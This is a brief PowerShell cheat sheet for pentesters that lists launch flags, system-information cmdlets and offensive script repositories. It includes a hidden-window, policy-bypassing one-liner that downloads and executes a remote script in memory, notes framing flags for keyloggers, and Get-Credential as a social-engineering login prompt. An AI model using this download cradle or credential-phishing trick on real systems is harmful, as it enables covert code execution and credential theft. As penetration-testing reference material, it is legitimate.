cheatsheets/cheatsheets/security/windows/powershell.md

---

title: Powershell Windows (Security-) Administration categories: [cheatsheets]

tags: [security, windows]

Powershell

1) powershell.exe Parameter:

-Exec Bypass    // allows the execution of scripts
-NoP            // NoProfile - keep same/standard environment
-NonI           // Non Interactive Mode -> No Promt, just execution of the commands
-W Hidden       // Hide the Window
-noexit         // Keeps the shell open (good for keyloggers etc)
-Command        // Execute a command

2) Use the powershell to get information about the system

Get-Hotfix      // checks windows patches
Get-Service     // print all services
Get-Process     // print all processes
Get-Credentials // Nice login field for social engineering

3) Load scripts from webserver and execute them (inline and in-memory)

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://URL/script.ps1');

Important:

-> Never use a unknown code from the internet for a client!

4) Some powershell scripts for pentesters

• https://github.com/cheetz/Easy-P
• https://github.com/PowerShellMafia/PowerSploit
• https://github.com/samratashok/nishang/tree/master/Gather